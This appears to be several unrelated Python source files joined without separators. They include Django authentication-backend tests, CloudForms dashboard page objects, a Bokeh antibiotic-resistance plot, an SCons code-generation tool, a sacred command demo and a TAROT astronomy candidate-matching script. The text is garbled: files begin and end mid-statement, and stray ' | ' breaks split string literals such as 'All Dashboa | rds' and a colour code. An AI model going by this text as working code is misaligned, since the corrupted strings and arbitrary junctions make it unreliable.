self.assertEqual(self.user3.get_group_permissions(TestObj()), {'group_perm'})
@override_settings(
AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'],
)
class AnonymousUserBackendTest(SimpleTestCase):
"""
Tests for AnonymousUser delegating to backend.
"""
def setUp(self):
self.user1 = AnonymousUser()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('anon', TestObj()), True)
def test_has_perms(self):
self.assertEqual(self.user1.has_perms(['anon'], TestObj()), True)
self.assertEqual(self.user1.has_perms(['anon', 'perm'], TestObj()), False)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), True)
self.assertEqual(self.user1.has_module_perms("app2"), False)
def test_get_all_permissions(self):
self.assertEqual(self.user1.get_all_permissions(TestObj()), {'anon'})
@override_settings(AUTHENTICATION_BACKENDS=[])
class NoBackendsTest(TestCase):
"""
Tests that an appropriate error is raised if no auth backends are provided.
"""
def setUp(self):
self.user = User.objects.create_user('test', 'test@example.com', 'test')
def test_raises_exception(self):
with self.assertRaises(ImproperlyConfigured):
self.user.has_perm(('perm', TestObj()))
@override_settings(AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'])
class InActiveUserBackendTest(TestCase):
"""
Tests for an inactive user
"""
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user1.is_active = False
self.user1.save()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('inactive', TestObj()), True)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), False)
self.assertEqual(self.user1.has_module_perms("app2"), False)
class PermissionDeniedBackend(object):
"""
Always raises PermissionDenied in `authenticate`, `has_perm` and `has_module_perms`.
"""
def authenticate(self, username=None, password=None):
raise PermissionDenied
def has_perm(self, user_obj, perm, obj=None):
raise PermissionDenied
def has_module_perms(self, user_obj, app_label):
raise PermissionDenied
class PermissionDeniedBackendTest(TestCase):
"""
Tests that other backends are not checked once a backend raises PermissionDenied
"""
backend = 'auth_tests.test_auth_backends.PermissionDeniedBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user1.save()
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_permission_denied(self):
"user is not authenticated after a backend raises permission denied #2550"
self.assertEqual(authenticate(username='test', password='test'), None)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_authenticates(self):
self.assertEqual(authenticate(username='test', password='test'), self.user1)
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_has_perm_denied(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), False)
self.assertIs(self.user1.has_module_perms('auth'), False)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_has_perm(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), True)
self.assertIs(self.user1.has_module_perms('auth'), True)
class NewModelBackend(ModelBackend):
pass
class ChangedBackendSettingsTest(TestCase):
"""
Tests for changes in the settings.AUTHENTICATION_BACKENDS
"""
backend = 'auth_tests.test_auth_backends.NewModelBackend'
TEST_USERNAME = 'test_user'
TEST_PASSWORD = 'test_password'
TEST_EMAIL = 'test@example.com'
def setUp(self):
User.objects.create_user(self.TEST_USERNAME,
self.TEST_EMAIL,
self.TEST_PASSWORD)
@override_settings(AUTHENTICATION_BACKENDS=[backend])
def test_changed_backend_settings(self):
"""
Tests that removing a backend configured in AUTHENTICATION_BACKENDS
make already logged-in users disconnect.
"""
# Get a session for the test user
self.assertTrue(self.client.login(
username=self.TEST_USERNAME,
password=self.TEST_PASSWORD)
)
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
# Remove NewModelBackend
with self.settings(AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend']):
# Get the user from the request
user = get_user(request)
# Assert that the user is now anonymous, since its
# backend is no longer in AUTHENTICATION_BACKENDS.
self.assertIsNotNone(user)
self.assertTrue(user.is_anonymous())
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboards for "{}"'.format(self.context["object"].group) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class DashboardFormCommon(CloudIntelReportsView):
title = Text("#explorer_title_text")
basic_information = Text(".//div[@id='form_div']/h3")
name = Input(name="name")
tab_title = Input(name="description")
locked = Checkbox("locked")
sample_dashboard = Text(".//div[@id='form_widgets_div']/h3")
widgets = DashboardWidgetsPicker(
"form_widgets_div",
select_id="widget",
names_locator=".//a[starts-with(@id, 'w_')]/..",
remove_locator=".//div[contains(@title, {})]//a/i"
)
cancel_button = Button("Cancel")
class NewDashboardView(DashboardFormCommon):
add_button = Button("Add")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Adding a new dashboard" and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboa | rds",
"All Groups",
self.context["object"].group
]
)
class EditDashboardView(DashboardFormCommon):
save_button = Button("Save")
reset_button = Button("Reset")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class EditDefaultDashboardView(EditDashboardView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class DashboardDetailsView(CloudIntelReportsView):
SAMPLE_DASHBOARD_ROOT = ".//div[@id='modules']"
ITEM_TITLE_LOCATOR = ".//h3[contains(@class, 'panel-title')]"
title = Text("#explorer_title_text")
name = SummaryFormItem("Basic Information", "Name")
tab_title = SummaryFormItem("Basic Information", "Tab Title")
@property
def selected_items(self):
items = []
for el in self.browser.elements(self.ITEM_TITLE_LOCATOR, self.SAMPLE_DASHBOARD_ROOT):
items.append(self.browser.text(el))
return items
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class DefaultDashboardDetailsView(DashboardDetailsView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class Dashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "group", "title", "widgets"]
def __init__(self, name, group, title=None, locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.name = name
self.title = title
self.locked = locked
self.widgets = widgets
self._group = group
@property
def group(self):
return self._group
def create(self, cancel=False):
"""Create this Dashboard in the UI."""
view = navigate_to(self, "Add")
view.fill({
"name": self.name,
"tab_title": self.title,
"locked": self.locked,
"widgets": self.widgets
})
view.add_button.click()
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
def update(self, updates):
"""Update this Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
for attr, value in updates.items():
setattr(self, attr, value)
view = self.create_view(DashboardDetailsView)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
def delete(self, cancel=False):
"""Delete this Dashboard in the UI.
Args:
cancel: Whether to cancel the deletion (default False).
"""
view = navigate_to(self, "Details")
view.configuration.item_select(
"Delete this Dashboard from the Database",
handle_alert=not cancel
)
if cancel:
assert view.is_displayed
view.flash.assert_no_error()
else:
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
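# A minimal usage sketch (assumptions: a configured appliance context; the
# group and widget names below are hypothetical):
#
#   dashboard = Dashboard("my_dashboard", "EvmGroup-administrator",
#                         title="My Dashboard", widgets=["Top CPU Consumers"])
#   dashboard.create()
#   dashboard.update({"tab_title": "Renamed Dashboard"})
#   dashboard.delete()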
class DefaultDashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "title", "widgets"]
def __init__(self, title="Default Dashboard", locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.title = title
self.locked = locked
self.widgets = widgets
@property
def name(self):
"""Name of Default Dashboard cannot be changed."""
return "default"
def update(self, updates):
"""Update Default Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DefaultDashboardDetailsView)
assert view.is_displayed
if changed:
view.flash.assert_success_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_success_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
@navigator.register(Dashboard, "Add")
class DashboardNew(CFMENavigateStep):
VIEW = NewDashboardView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group
)
self.prerequisite_view.configuration.item_select("Ad |
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
from math import log, sqrt
import numpy as np
import pandas as pd
from six.moves import cStringIO as StringIO
from bokeh.plotting import figure, show, output_server
antibiotics = """
bacteria, penicillin, streptomycin, neomycin, gram
Mycobacterium tuberculosis, 800, 5, 2, negative
Salmonella schottmuelleri, 10, 0.8, 0.09, negative
Proteus vulgaris, 3, 0.1, 0.1, negative
Klebsiella pneumoniae, 850, 1.2, 1, negative
Brucella abortus, 1, 2, 0.02, negative
Pseudomonas aeruginosa, 850, 2, 0.4, negative
Escherichia coli, 100, 0.4, 0.1, negative
Salmonella (Eberthella) typhosa, 1, 0.4, 0.008, negative
Aerobacter aerogenes, 870, 1, 1.6, negative
Brucella antracis, 0.001, 0.01, 0.007, positive
Streptococcus fecalis, 1, 1, 0.1, positive
Staphylococcus aureus, 0.03, 0.03, 0.001, positive
Staphylococcus albus, 0.007, 0.1, 0.001, positive
Streptococcus hemolyticus, 0.001, 14, 10, positive
Streptococcus viridans, 0.005, 10, 40, positive
Diplococcus pneumoniae, 0.005, 11, 10, positive
"""
drug_color = OrderedDict([
("Penicillin", "#0d3362"),
("Streptomycin", "#c | 64737"),
("Neomycin", "black" ),
])
gram_color = {
"positive" : "#aeaeb8",
"negative" : "#e69584",
}
df = pd.read_csv(StringIO(antibiotics),
skiprows=1,
skipinitialspace=True,
engine='python')
width = 800
height = 800
inner_radius = 90
outer_radius = 300 - 10
minr = sqrt(log(.001 * 1E4))
maxr = sqrt(log(1000 * 1E4))
a = (outer_radius - inner_radius) / (minr - maxr)
b = inner_radius - a * maxr
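# rad() maps an MIC value onto the radial axis: wedge heights are spaced on a
# sqrt(log(mic * 1E4)) scale, and a/b above are the linear coefficients that
# send [minr, maxr] onto [outer_radius, inner_radius].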
def rad(mic):
return a * np.sqrt(np.log(mic * 1E4)) + b
big_angle = 2.0 * np.pi / (len(df) + 1)
small_angle = big_angle / 7
x = np.zeros(len(df))
y = np.zeros(len(df))
output_server("burtin")
p = figure(plot_width=width, plot_height=height, title="",
x_axis_type=None, y_axis_type=None,
x_range=[-420, 420], y_range=[-420, 420],
min_border=0, outline_line_color="black",
background_fill="#f0e1d2", border_fill="#f0e1d2")
p.line(x+1, y+1, alpha=0)
# annular wedges
angles = np.pi/2 - big_angle/2 - df.index.to_series()*big_angle
colors = [gram_color[gram] for gram in df.gram]
p.annular_wedge(
x, y, inner_radius, outer_radius, -big_angle+angles, angles, color=colors,
)
# small wedges
p.annular_wedge(x, y, inner_radius, rad(df.penicillin),
-big_angle+angles+5*small_angle, -big_angle+angles+6*small_angle,
color=drug_color['Penicillin'])
p.annular_wedge(x, y, inner_radius, rad(df.streptomycin),
-big_angle+angles+3*small_angle, -big_angle+angles+4*small_angle,
color=drug_color['Streptomycin'])
p.annular_wedge(x, y, inner_radius, rad(df.neomycin),
-big_angle+angles+1*small_angle, -big_angle+angles+2*small_angle,
color=drug_color['Neomycin'])
# circular axes and labels
labels = np.power(10.0, np.arange(-3, 4))
radii = a * np.sqrt(np.log(labels * 1E4)) + b
p.circle(x, y, radius=radii, fill_color=None, line_color="white")
p.text(x[:-1], radii[:-1], [str(r) for r in labels[:-1]],
text_font_size="8pt", text_align="center", text_baseline="middle")
# radial axes
p.annular_wedge(x, y, inner_radius-10, outer_radius+10,
-big_angle+angles, -big_angle+angles, color="black")
# bacteria labels
xr = radii[0]*np.cos(np.array(-big_angle/2 + angles))
yr = radii[0]*np.sin(np.array(-big_angle/2 + angles))
label_angle=np.array(-big_angle/2+angles)
label_angle[label_angle < -np.pi/2] += np.pi # easier to read labels on the left side
p.text(xr, yr, df.bacteria, angle=label_angle,
text_font_size="9pt", text_align="center", text_baseline="middle")
# OK, these hand drawn legends are pretty clunky, will be improved in future release
p.circle([-40, -40], [-370, -390], color=list(gram_color.values()), radius=5)
p.text([-30, -30], [-370, -390], text=["Gram-" + gr for gr in gram_color.keys()],
text_font_size="7pt", text_align="left", text_baseline="middle")
p.rect([-40, -40, -40], [18, 0, -18], width=30, height=13,
color=list(drug_color.values()))
p.text([-15, -15, -15], [18, 0, -18], text=list(drug_color.keys()),
text_font_size="9pt", text_align="left", text_baseline="middle")
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
show(p)
#!/usr/bin/env python
#
# Copyright (c) 2009, Roboterclub Aachen e.V.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Roboterclub Aachen e.V. nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ROBOTERCLUB AACHEN E.V. ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ROBOTERCLUB AACHEN E.V. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import SCons
import SCons.Errors
# TODO make this more robust against whitespace etc.
includeExpression = re.compile(r'<include>(\S+)</include>', re.M)
# -----------------------------------------------------------------------------
def find_includes(env, file, include_path):
""" Find include directives in an XML file """
files = []
line_count = 0
for line in open(file).readlines():
line_count = line_count + 1
match = includeExpression.search(line)
if match:
filename = match.group(1)
relative_to_file = os.path.join(os.path.dirname(os.path.abspath(file)), filename)
relative_to_include_path = os.path.join(include_path, filename)
# 1.) include file name can be absolute
if os.path.isabs(filename):
files.append(filename)
# 2.) it could be a path relative to the file's path
# this works just like #include "{filename}" in C/C++
elif os.path.isfile(relative_to_file):
files.append(relative_to_file)
# 3.) it could be a path relative to the include path
elif os.path.isfile(relative_to_include_path):
files.append(relative_to_include_path)
# 4.) Error!
else:
env.Error("Could not find include file '%s' in '%s:%s'" % (filename, file, line_count))
return files
def xml_include_scanner(node, env, path, arg=None):
""" Generates the dependencies for the XML files """
abspath, targetFilename = os.path.split(node.get_abspath())
stack = [targetFilename]
dependencies = [targetFilename]
while stack:
nextFile = stack.pop()
files = find_includes(env, os.path.join(abspath, nextFile), abspath)
for file in files:
if file not in dependencies:
stack.append(file)
dependencies.extend(files)
dependencies.remove(targetFilename)
return dependencies
# -----------------------------------------------------------------------------
def packet_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "packets.cpp"),
os.path.join(path, "packets.hpp")]
return (target, source)
def identifier_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "identifier.hpp")]
return (target, source)
def postman_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "postman.cpp"),
os.path.join(path, "postman.hpp")]
return (target, source)
def communication_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "communication.hpp")]
return (target, source)
def xpcc_task_caller_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "caller.hpp")]
return (target, source)
# -----------------------------------------------------------------------------
def generate(env, **kw):
env.SetDefault(XPCC_SYSTEM_DESIGN_SCANNERS = {})
env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'] = SCons.Script.Scanner(
function = xml_include_scanner,
skeys = ['.xml'])
env['BUILDERS']['SystemCppPackets'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_packets.py" ' \
'--source_path ${TARGETS[0].dir} ' \
'--header_path ${TARGETS[1].dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_PACKETS_COMSTR"),
emitter = packet_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppIdentifier'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_identifier.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_IDENTIFIER_COMSTR"),
emitter = identifier_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppPostman'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_postman.py" ' \
'--container "${container}" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_POSTMAN_COMSTR"),
emitter = postman_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppCommunication'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_communication.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_COMMUNICATION_COMSTR"),
emitter = communication_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppXpccTaskCaller'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_xpcc_task_caller.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR"),
emitter = xpcc_task_caller_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
if SCons.Script.ARGUMENTS.get('verbose') != '1':
env['SYSTEM_CPP_PACKETS_COMSTR'] = "Generate packets from: $SOURCE"
env['SYSTEM_CPP_IDENTIFIER_COMSTR'] = "Generate identifier from: $SOURCE"
env['SYSTEM_CPP_POSTMAN_COMSTR'] = "Generate postman from: $SOURCE"
env['SYSTEM_CPP_COMMUNICATION_COMSTR'] = "Generate communication stubs from: $SOURCE"
env['SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR'] = "Generate xpcc task callers from: $SOURCE"
def exists(env):
return True
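# A minimal SConscript sketch using these builders (assumptions: this tool is
# registered on the toolpath under a hypothetical name, and robot.xml exists):
#
#   env = Environment(tools=['default', 'system_design'], toolpath=['scons'])
#   env['XPCC_SYSTEM_BUILDER'] = '../tools/system_design/builder'
#   env.SystemCppPackets('robot.xml', path='generated', namespace='robot')
#   env.SystemCppIdentifier('robot.xml', path='generated', namespace='robot')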
from sacred import Experiment
ex = Experiment('my_commands')
@ex.config
def cfg():
name = 'kyle'
@ex.command
def greet(name):
print('Hello {}! Nice to greet you!'.format(name))
@ex.command
def shout():
print('WHAZZZUUUUUUUUUUP!!!????')
@ex.automain
def main():
print('This is just the main command. Try greet or shout.')
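# Example invocations (assuming this file is saved as my_commands.py):
#
#   python my_commands.py                    # runs main()
#   python my_commands.py greet              # -> Hello kyle! Nice to greet you!
#   python my_commands.py greet with name=Ada
#   python my_commands.py shout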
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 14:53:55 2016
@author: nu
"""
import numpy as np
import timeit, os, sys
from astropy.coordinates import SkyCoord
from astropy.table import Column
from astroquery.vizier import Vizier
from astropy import units as u
from TAROT_PL import TarotPIP
from Filter_data import (reoffset, Lsep_candi, tbmagnitude, XYlimit, W_to_P)
#from Data_graph import candidateplot
from renametxt import Renametxt
""" This algorithm will run a file at a time by in put directly """
start = timeit.default_timer()
#start import file
input_fits = raw_input("Please put FITS [/path_file/file.fits]: "); fitsfile = Renametxt(input_fits)
savefolder = '/home/tarot/Documents/Data_Output/' # where to keep output files; change this as needed
if not os.path.exists(savefolder):
savefolder = '/tmp/'
print("Output is at %s" %savefolder)
#Use algorithm from TarotPip
""" SExdata is data extract by Sextractor which keep in 'output.cat'
Catalog is obtain from USNO-B1.0 and store in Table format
Ccata is the coordinate of catalog in SkyCoord [RA, DEC]
Cdata is the coordinate of object from image in SkyCoord [RA, DEC]"""
TAROT_data = TarotPIP(fitsfile); TAROT_data.fitsfileinfo();
try:
SExdata, Catalog, Ccata, Cdata = TAROT_data.readData()
except(ValueError, IOError):
print("%s: check data table, catalog\n"%TAROT_data.image)
sys.exit(0)
#hdu = fits.open(fitsfile); tbdata = hdu[0].data; hdu.close();
""" Start to math by using 'match_to_catalog_sky' import from 'Astropy'
idx is the index of object in catalog that math with Cdata
d2d is the angular separation between Ccata and Cdata in degree
d3d is 3 dimension distace [we don't use it
matches are the closest Ccata with Cdata in SkyCoord [RA, DEC]"""
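# Under the hood this is astropy's catalog matching, roughly:
#   idx, d2d, d3d = Cdata.match_to_catalog_sky(Ccata)
#   matches = Ccata[idx]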
try:
idx, d2d, d3d, matches = TAROT_data.Data_match_catalog()
except (ValueError, IOError):
print("\n Matching error !!!, check 'Data_match_catalog function'")
sys.exit(1)
#Calibration data with catalog
""" Calibration the object in image to catalog and then re-matching again
idx, d2d, matches are the same meaning but value and coordinate may change
Cdata_offset is the new SkyCoord of Cdata after calibration (or off-set)"""
try:
idx, d2d, d3d, matches, Cdata_offset = reoffset(d2d, matches, Cdata, Ccata)
except (ValueError, IOError):
print("\n offset coordinate error !!!, check 'reoffset function'")
sys.exit(2)
# Select candidates with high angular distance (assumed to be new objects in the field)
""" idx_candi_catalog is the idx for the catalog
idx_candi_data is the idx for the data [Caution: there are two data SkyCoords]"""
try:
idx_candi_catalog, idx_candi_data = Lsep_candi(3, idx, d2d, SExdata) #10*std of d2d
except(ValueError, IOError):
print("\n Candidate sellected error !!!, check 'Lsep_candi function'")
sys.exit(3)
#cut candidate near the edge of image
try:
XYcandi, idx_XYcandi_data, idx_XYcandi_cata = XYlimit(Cdata_offset,idx_candi_data, idx_candi_catalog, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\nProblem with limit candidate in the edge !!!, check 'idx_XYcandi_cata' function")
sys.exit(4)
#convert world to pixel
try:
Catalog_WTP, Matches_WTP, Cdata_offset_WTP = W_to_P(Ccata, Cdata_offset, matches, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\n Convert wcs error!!!, check 'W_to_P function'")
sys.exit(5)
#Select candidates by local angular separation (among 10 objects next to each other)
""" d2d_candi is in degrees, the candidates selected by using the angular separation
Cdata_candi, Ccata_candi are the SkyCoord [RA, DEC] of the candidates
for the data (offset) and the catalog, respectively, but
cata_candi is the information of the candidates in the catalog (all info. available)"""
#d2d_candi = d2d[idx_candi_data]
Cdata_candi = Cdata_offset[idx_XYcandi_data]
cata_candi = Catalog[idx_XYcandi_cata]
Ccata_candi = Ccata[idx_XYcandi_cata]
#Magnitude comparison and selection
""" There is a mismatch between the magnitudes of the data and the catalog """
tbmag = tbmagnitude(idx, SExdata, Catalog)
Cdata_col_ra = Column(Cdata_offset.ra, name='ra')
Cdata_col_dec = Column(Cdata_offset.dec, name='dec')
Ang_sept_candidate = Column((d2d.arcsec*u.arcsec), name='Separation')
tbmag.add_column(Cdata_col_ra,index=None)
tbmag.add_column(Cdata_col_dec,index=None)
tbmag.add_column(Ang_sept_candidate,index=None)
Candi_d2d = tbmag[idx_XYcandi_data]
""" Candidate can be create in a tables,
by angular distance (d2d), in ASCII or HTML file
"""
#HTML
#savename_html = os.path.join(savefolder, TAROT_data.fname + 'html_d2d_candidate.dat')
#Candi_d2d.write(savename_html, format='ascii.html')
#ASCII
#savename_ascii = os.path.join(savefolder, TAROT_data.fname + 'ascii_d2d_candidate.dat')
#Candi_d2d.write(savename_ascii, format='ascii')
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
print('\nMedian of separation : STD %3.2f\" : %3.2f\"\n' %(np.median(d2d.arcsec), np.std(d2d.arcsec)))
print('Number of candidate\t\t:%d\n' %len(Candi_d2d))
print('-----------------------------------------------------------------\n')
print(Candi_d2d)
print("\n")
line0_reg_ds9 = "global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal roman\" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n"
line1_reg_ds9 = "icrs\n"
Candi_reg = open("/tmp/Candi_region_Gaia.reg", 'w')
Candi_reg.write(line0_reg_ds9)
Candi_reg.write(line1_reg_ds9)
for i in range(len(Candi_d2d)):
Candi_reg.write("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}\n" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
Candi_reg.close()
#print("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
print("\n")
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
#Filter candidate by checking with catalog USNO and NOMAD1
confirm_1 = []; confirm_2 = [];
confirm_candi_0 = []; confirm_candi_1 = []; confirm_candi_2 = [];
for i in range(len(Cdata_candi)):
confirm_candi_1 = Vizier(catalog="USNO-B1.0", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_1:
confirm_1.append(i)
for i in range(len(Cdata_candi)):
confirm_candi_2 = Vizier(catalog="NOMAD1", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_2:
confirm_2.append(i)
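# Note: astroquery's Vizier.query_region returns a (possibly empty) TableList;
# an empty result is falsy, so "if not confirm_candi_N" keeps only candidates
# with no counterpart within the 10 arcsec search radius.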
# Write candidate to disk
savename_ascii = os.path.join(savefolder,TAROT_data.fname + '.candi.dat')
info_candi_1 = Candi_d2d[confirm_1]
info_candi_1.write(savename_ascii, format='ascii') # Candidate after check with USNO-B1.0 and write to disk
info_candi_2 = Candi_d2d[confirm_2]
print("\n::::::::::::::::::::::: Potential candidate check with USNO-B1.0 :::::::::::::::::::::\n")
try:
print(info_candi_1)
print("\n")
Candi_reg1 = open("/tmp/Candi_region_USNO.txt", 'w')
Candi_reg1.write(line0_reg_ds9)
Candi_reg1.write(line1_reg_ds9)
for i in range(len(info_candi_1)):
Candi_reg1.write("circle(%f, %f, 16.0\") # color=blue text={USNO_%d}\n" %(info_candi_1["ra"][i], info_candi_1["dec"][i], i))
Candi_reg1.close()
print("Number of Candidate %d" %len(info_candi_1))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in USNO-B1.0\n\n")
print("\n::::::::::::::::::::::: Potential candidate check with NOMAD1 :::::::::::::::::::::\n")
try:
print(info_candi_2)
print("\n")
Candi_reg2 = open("/tmp/Candi_region_NOMAD1.txt", 'w')
